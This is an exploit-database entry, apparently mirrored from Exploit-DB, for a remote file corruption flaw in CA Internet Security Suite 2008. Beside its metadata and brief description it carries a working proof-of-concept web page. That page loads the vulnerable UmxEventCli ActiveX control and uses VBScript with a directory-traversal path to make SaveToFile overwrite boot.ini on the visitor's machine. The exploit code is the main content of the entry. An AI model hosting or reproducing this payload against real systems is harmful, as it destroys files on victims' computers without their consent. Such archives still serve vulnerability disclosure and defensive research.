header-logo
Suggest Exploit
vendor:
Internet Security Suite 2008
by:
Nine:Situations:Group::surfista
9.3
CVSS
HIGH
Remote File Corruption
22
CWE
Product Name: Internet Security Suite 2008
Affected Version From: CA Internet Security Suite 2008
Affected Version To: CA Internet Security Suite 2008
Patch Exists: YES
Related CWE: N/A
CPE: a:ca:internet_security_suite_2008
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

CA Internet Security Suite 2008 (UmxEventCli.dll/SaveToFile()) remote file corruption poc

This proof-of-concept code exploits a vulnerability in CA Internet Security Suite 2008 (UmxEventCli.dll/SaveToFile()) which allows a remote attacker to corrupt a file on the vulnerable system. The vulnerability is caused due to the application not properly validating user-supplied input before using it in a filesystem operation. This can be exploited to corrupt arbitrary files on the vulnerable system.

Mitigation:

Upgrade to the latest version of CA Internet Security Suite 2008.
Source

Exploit-DB raw data:

<!--
CA Internet Security Suite 2008 (UmxEventCli.dll/SaveToFile())
remote file corruption poc
by Nine:Situations:Group::surfista

this control is safe for scripting
and safe for initialize

original one: http://retrogod.altervista.org/9sg_CA_poc.html
-->
<html><object classid='clsid:F13D3742-6C4F-4915-BF91-784BA02DD0BE' id='UmxEventCliLib'/>
</object><script language='vbscript'>
filePath="..\..\..\..\..\..\..\boot.ini"
UmxEventCliLib.SaveToFile filePath
</script></html>

# milw0rm.com [2008-05-28]

Navigation

Suggest Exploit

Services By CQR